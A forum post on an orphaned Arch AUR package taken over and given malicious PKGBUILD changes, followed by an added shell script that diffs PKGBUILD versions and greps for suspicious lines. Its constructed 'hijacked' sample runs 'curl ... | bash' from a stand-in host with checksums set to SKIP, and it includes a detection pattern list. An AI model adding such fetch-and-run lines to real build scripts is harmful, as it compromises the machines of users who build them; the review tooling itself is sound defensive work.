what happened is someone took over an orphaned package & made malicious changes to the PKGBUILD. the fact that they could do that is totally normal and does NOT indicate that the AUR itself is compromised or anything. nobody claimed that either, but i'm just making sure that people understand what is happening here.
if you know what the AUR is and how it works, this is really no surprise at all.
one is not supposed to trust these packages explicitly.
i usually go by votes & popularity & comments.
if something is off, people notice very quickly (comments) and take appropriate action (thanks to Arch Linux's concept of Trusted Users this is possible).
Btw, all this was fixed 1-3 days BEFORE these articles even came out.
PS: of the four links in post #1 i found this one most informative. it's all there if one cares to read beyond a few buzzwords.
PPS: my original assessment that it's the acroread program itself that is the malware was wrong. once again, read the article.
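Added example, not from the post above and not part of any AUR tooling: the practical check behind "one is not supposed to trust these packages" is to diff the PKGBUILD you are about to build against the copy you last reviewed and look at what was added. The shell below does that for two constructed sample PKGBUILDs (a clean one and the same package after a hypothetical hostile takeover that adds a remote `curl | bash` and switches the checksum to `SKIP`); the file names, the `foo` package and the `example.invalid` URLs are all made up, and the pattern list is a starting point, not a complete detector.

```shell
#!/bin/sh
# Added example: review what changed in a PKGBUILD before running makepkg.
# Sample PKGBUILDs below are constructed; nothing here is AUR or Arch code.

# Patterns worth a second look in a build script: remote fetches piped into
# a shell, eval, decoded blobs, /tmp staging, and disabled checksums.
SUSPICIOUS='curl|wget|\| *(ba)?sh|eval |base64 +-d|/tmp/|SKIP'

# Print every line of a PKGBUILD ($1) that matches SUSPICIOUS, numbered.
pkgbuild_suspicious_lines() {
  grep -nE "$SUSPICIOUS" "$1"
}

# Print only the lines ADDED between the reviewed copy ($1) and the new one ($2).
pkgbuild_added_lines() {
  diff -u "$1" "$2" | grep '^+' | grep -v '^+++' | sed 's/^+//'
}

# Count added lines that match SUSPICIOUS; 0 means nothing obviously new to worry about.
count_new_suspicious() {
  pkgbuild_added_lines "$1" "$2" | grep -cE "$SUSPICIOUS"
}

# Constructed sample: the PKGBUILD as previously reviewed and built.
write_old_sample() {
  cat >"$1" <<'EOF'
pkgname=foo
pkgver=1.0
pkgrel=1
source=("https://example.invalid/foo-1.0.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')
package() {
  install -Dm755 foo "$pkgdir/usr/bin/foo"
}
EOF
}

# Constructed sample: the same package after a hypothetical takeover.
# Only pkgrel changed visibly; the checksum is now SKIP and package()
# fetches and runs a remote script at build time.
write_new_sample() {
  cat >"$1" <<'EOF'
pkgname=foo
pkgver=1.0
pkgrel=2
source=("https://example.invalid/foo-1.0.tar.gz")
sha256sums=('SKIP')
package() {
  curl -s https://example.invalid/x | bash
  install -Dm755 foo "$pkgdir/usr/bin/foo"
}
EOF
}

# Stand-alone run: write both samples to a temp dir and report the added
# lines that match, which is what a reviewer should read before building.
demo() {
  d=$(mktemp -d)
  write_old_sample "$d/PKGBUILD.old"
  write_new_sample "$d/PKGBUILD.new"
  echo "suspicious added lines: $(count_new_suspicious "$d/PKGBUILD.old" "$d/PKGBUILD.new")"
  pkgbuild_added_lines "$d/PKGBUILD.old" "$d/PKGBUILD.new" | grep -E "$SUSPICIOUS"
  rm -rf "$d"
}

demo
```

In real use the "old" copy is whatever you reviewed last time (for example a checkout of the package's AUR git history at the commit you built), and a non-zero count is a reason to read the full diff, not a verdict; a bump of `pkgrel` alone, as in the sample, is exactly the kind of change that looks harmless in a helper's summary view.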